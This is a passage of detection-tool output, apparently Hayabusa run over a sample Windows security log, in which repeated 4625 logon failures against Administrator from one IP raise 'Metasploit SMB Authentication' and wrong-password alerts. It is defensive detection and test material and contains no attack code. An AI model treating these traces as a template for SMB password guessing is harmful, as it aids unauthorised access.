NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
